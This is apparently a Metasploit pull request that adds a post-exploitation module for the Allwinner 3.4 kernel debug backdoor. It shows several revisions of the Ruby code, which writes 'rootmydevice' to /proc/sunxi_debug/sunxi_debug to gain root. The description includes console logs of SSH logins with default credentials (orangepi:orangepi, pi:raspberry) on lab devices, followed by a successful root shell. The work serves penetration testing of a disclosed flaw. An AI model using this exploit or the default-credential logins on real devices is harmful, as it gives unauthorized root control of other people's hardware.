### PR TITLE
Allwinner priv escalation

### DIFF
--- a/modules/post/multi/escalate/allwinner_backdoor.rb
+++ b/modules/post/multi/escalate/allwinner_backdoor.rb
@@ -4,12 +4,12 @@
 ##
 
 require 'msf/core'
+require 'rex'
 
 class MetasploitModule < Msf::Post
 
   include Msf::Post::File
   include Msf::Post::Linux::Priv
-  include Msf::Post::Linux::System
 
   def initialize(info={})
     super( update_info( info,
@@ -20,38 +20,39 @@ class MetasploitModule < Msf::Post
         'License'        => MSF_LICENSE,
         'Author'         =>
           [
-            'h00die <mike@stcyrsecurity.com>'            # Module
+            'h00die <mike@stcyrsecurity.com>',  # Module
+            'KotCzarny'                         # Discovery
           ],
-        'Platform'       => %w{ android linux },
+        'Platform'       => [ 'android', 'linux' ],
         'DisclosureDate' => 'Apr 30 2016',
-        'Arch'           => [ARCH_ARMLE, ARCH_DALVIK],
         'References'     =>
           [
             [ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
-            [ 'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us']
+            [ 'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'],
+            [ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']
           ],
-        'SessionTypes'   => [ 'shell' ]
+        'SessionTypes'   => [ 'shell', 'meterpreter' ]
       ))
 
   end
 
   def run
-    backdoor = "/proc/sunxi_debug/sunxi_debug"
+    backdoor = '/proc/sunxi_debug/sunxi_debug'
     if file_exist?(backdoor)
-      vprint_good "Backdoor found, exploiting."
+      vprint_good 'Backdoor found, exploiting.'
       cmd_exec('echo "rootmydevice" > #{backdoor}')
       if is_root?
-        print_good "Privilege Escalation Successful"
+        print_good 'Privilege Escalation Successful'
         report_note(
           :host => session,
-          :type => "host.escalation",
-          :data => "Escalated to root shell via backdoor"
+          :type => 'host.escalation',
+          :data => 'Escalated to root shell via backdoor'
         )
       else
-        print_error "Privilege Escalation FAILED"
+        print_error 'Privilege Escalation FAILED'
       end
     else
-      print_error "Backdoor #{backdoor} not found."
+      print_error 'Backdoor #{backdoor} not found.'
     end
   end
 

--- a/modules/post/multi/escalate/allwinner_backdoor.rb
+++ b/modules/post/multi/escalate/allwinner_backdoor.rb
@@ -3,8 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-require 'rex'
+require "msf/core"
+#require "rex"
 
 class MetasploitModule < Msf::Post
 
@@ -13,46 +13,46 @@ class MetasploitModule < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-        'Name'           => 'Allwinner 3.4 Legacy Kernel Local Privileges Escalation',
-        'Description'    => %q{
+        "Name"           => "Allwinner 3.4 Legacy Kernel Local Privileges Escalation",
+        "Description"    => %q{
           This module attempts to exploit a debug backdoor privilege escalation.
         },
-        'License'        => MSF_LICENSE,
-        'Author'         =>
+        "License"        => MSF_LICENSE,
+        "Author"         =>
           [
-            'h00die <mike@stcyrsecurity.com>',  # Module
-            'KotCzarny'                         # Discovery
+            "h00die <mike@stcyrsecurity.com>",  # Module
+            "KotCzarny"                         # Discovery
           ],
-        'Platform'       => [ 'android', 'linux' ],
-        'DisclosureDate' => 'Apr 30 2016',
-        'References'     =>
+        "Platform"       => [ "android", "linux" ],
+        "DisclosureDate" => "Apr 30 2016",
+        "References"     =>
           [
-            [ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
-            [ 'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'],
-            [ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']
+            [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
+            [ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
+            [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
           ],
-        'SessionTypes'   => [ 'shell', 'meterpreter' ]
+        "SessionTypes"   => [ "shell", "meterpreter" ]
       ))
 
   end
 
   def run
-    backdoor = '/proc/sunxi_debug/sunxi_debug'
+    backdoor = "/proc/sunxi_debug/sunxi_debug"
     if file_exist?(backdoor)
-      vprint_good 'Backdoor found, exploiting.'
-      cmd_exec('echo "rootmydevice" > #{backdoor}')
+      vprint_good "Backdoor found, exploiting."
+      cmd_exec("echo rootmydevice > #{backdoor}")
       if is_root?
-        print_good 'Privilege Escalation Successful'
+        print_good "Privilege Escalation Successful"
         report_note(
           :host => session,
-          :type => 'host.escalation',
-          :data => 'Escalated to root shell via backdoor'
+          :type => "host.escalation",
+          :data => "Escalated to root shell via backdoor"
         )
       else
-        print_error 'Privilege Escalation FAILED'
+        print_error "Privilege Escalation FAILED"
       end
     else
-      print_error 'Backdoor #{backdoor} not found.'
+      print_error "Backdoor #{backdoor} not found."
     end
   end
 

--- a/modules/post/multi/escalate/allwinner_backdoor.rb
+++ b/modules/post/multi/escalate/allwinner_backdoor.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-        "Name"           => "Allwinner 3.4 Legacy Kernel Local Privileges Escalation",
+        "Name"           => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
         "Description"    => %q{
           This module attempts to exploit a debug backdoor privilege escalation in
           Allwinner SoC based devices.
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Post
         report_note(
           :host => session,
           :type => "host.escalation",
-          :data => "Escalated to root shell via backdoor"
+          :data => "Escalated to root shell via Allwinner backdoor"
         )
       else
         print_error "Privilege Escalation FAILED"

--- a/modules/post/multi/escalate/allwinner_backdoor.rb
+++ b/modules/post/multi/escalate/allwinner_backdoor.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Post
       cmd_exec("echo rootmydevice > #{backdoor}")
       if is_root?
         print_good "Privilege Escalation Successful"
-        report_note(
+        report_vuln(
           :host => session,
           :type => "host.escalation",
           :data => "Escalated to root shell via Allwinner backdoor"

--- a/modules/post/multi/escalate/allwinner_backdoor.rb
+++ b/modules/post/multi/escalate/allwinner_backdoor.rb
@@ -4,7 +4,6 @@
 ##
 
 require "msf/core"
-#require "rex"
 
 class MetasploitModule < Msf::Post
 
@@ -15,7 +14,15 @@ class MetasploitModule < Msf::Post
     super( update_info( info,
         "Name"           => "Allwinner 3.4 Legacy Kernel Local Privileges Escalation",
         "Description"    => %q{
-          This module attempts to exploit a debug backdoor privilege escalation.
+          This module attempts to exploit a debug backdoor privilege escalation in
+          Allwinner SoC based devices.
+          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
+          Vulnerable OS: all OS images available for Orange Pis,
+                         any for FriendlyARM's NanoPi M1,
+                         SinoVoip's M2+ and M3,
+                         Cuebietech's Cubietruck +
+                         Linksprite's pcDuino8 Uno
+          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
         },
         "License"        => MSF_LICENSE,
         "Author"         =>
@@ -55,5 +62,4 @@ class MetasploitModule < Msf::Post
       print_error "Backdoor #{backdoor} not found."
     end
   end
-
 end

--- a/modules/post/multi/manage/allwinner_backdoor.rb
+++ b/modules/post/multi/manage/allwinner_backdoor.rb
@@ -1,0 +1,58 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'           => 'Allwinner 3.4 Legacy Kernel Local Privileges Escalation',
+        'Description'    => %q{
+          This module attempts to exploit a debug backdoor privilege escalation.
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die <mike@stcyrsecurity.com>'            # Module
+          ],
+        'Platform'       => %w{ android linux },
+        'DisclosureDate' => 'Apr 30 2016',
+        'Arch'           => [ARCH_ARMLE, ARCH_DALVIK],
+        'References'     =>
+          [
+            [ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
+            [ 'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us']
+          ],
+        'SessionTypes'   => [ 'shell' ]
+      ))
+
+  end
+
+  def run
+    backdoor = "/proc/sunxi_debug/sunxi_debug"
+    if file_exist?(backdoor)
+      vprint_good "Backdoor found, exploiting."
+      cmd_exec('echo "rootmydevice" > #{backdoor}')
+      if is_root?
+        print_good "Privilege Escalation Successful"
+        report_note(
+          :host => session,
+          :type => "host.escalation",
+          :data => "Escalated to root shell via backdoor"
+        )
+      else
+        print_error "Privilege Escalation FAILED"
+      end
+    else
+      print_error "Backdoor #{backdoor} not found."
+    end
+  end
+
+end


### PR DESCRIPTION
Implements the Allwinner priv escalation as documented in #6869.  Very simple debug kernel module that when "rootmydevice" is echoed to the process, it escalates the shell to root.
## Verification

Need a vulnerable device.  I utilized an Orange Pi (PC model) running Lubuntu 14.04 v 0.8.0, but other OSes for the device (as well as other devices) are also vulnerable.
I utilized an ssh shell as my primary access.
- [x] Start `msfconsole`
- [x] `use auxiliary/scanner/ssh/ssh_login`

```
msf auxiliary(ssh_login) > set username orangepi
username => orangepi
msf auxiliary(ssh_login) > set password orangepi
password => orangepi
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
rhosts => 192.168.2.21
msf auxiliary(ssh_login) > exploit

[*] 192.168.2.21:22 SSH - Starting bruteforce
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- [x] `use post/multi/escalate/allwinner_backdoor`

```
msf post(allwinner_backdoor) > set verbose true
verbose => true
msf post(allwinner_backdoor) > set session 1
session => 1
msf post(allwinner_backdoor) > run
```
- [x] Verify successful exploitation:

```
[+] Backdoor found, exploiting.
[+] Privilege Escalation Successful
[*] Post module execution completed
msf post(allwinner_backdoor) > sessions -i 1
[*] Starting interaction with 1...

2013564244
uHvwyYtCTXENEYdrCoKdgVxTpKlbnqsW
true
RUVRnPJFFgVpuqEiYXdtXpwdDZxVwZPS
TitlDmvnSvINczARsMAKdajpRoXEohXO
0
RtBPRSiAsiGoFatKQVukpjIjGBpJdXqq
id
uid=0(root) gid=0(root) groups=0(root),27(sudo),29(audio),1001(orangepi)
^Z
Background session 1? [y/N]  y
```
- [x] Verify graceful exit on non-vulnerable devices:

```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username pi
username => pi
msf auxiliary(ssh_login) > set password raspberry
password => raspberry
msf auxiliary(ssh_login) > set rhosts basementpi
rhosts => basementpi
msf auxiliary(ssh_login) > exploit

[*] 192.168.2.80:22 SSH - Starting bruteforce
[+] 192.168.2.80:22 SSH - Success: 'pi:raspberry' 'uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),106(netdev),996(gpio),997(i2c),998(spi),999(input) Linux basementpi 4.1.19-v7+ #858 SMP Tue Mar 15 15:56:00 GMT 2016 armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:36438 -> 192.168.2.80:22) at 2016-05-17 22:19:57 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > use post/multi/escalate/allwinner_backdoor
msf post(allwinner_backdoor) > set verbose true
verbose => true
msf post(allwinner_backdoor) > set session 1
session => 1
msf post(allwinner_backdoor) > run

[-] Backdoor /proc/sunxi_debug/sunxi_debug not found.
[*] Post module execution completed
```
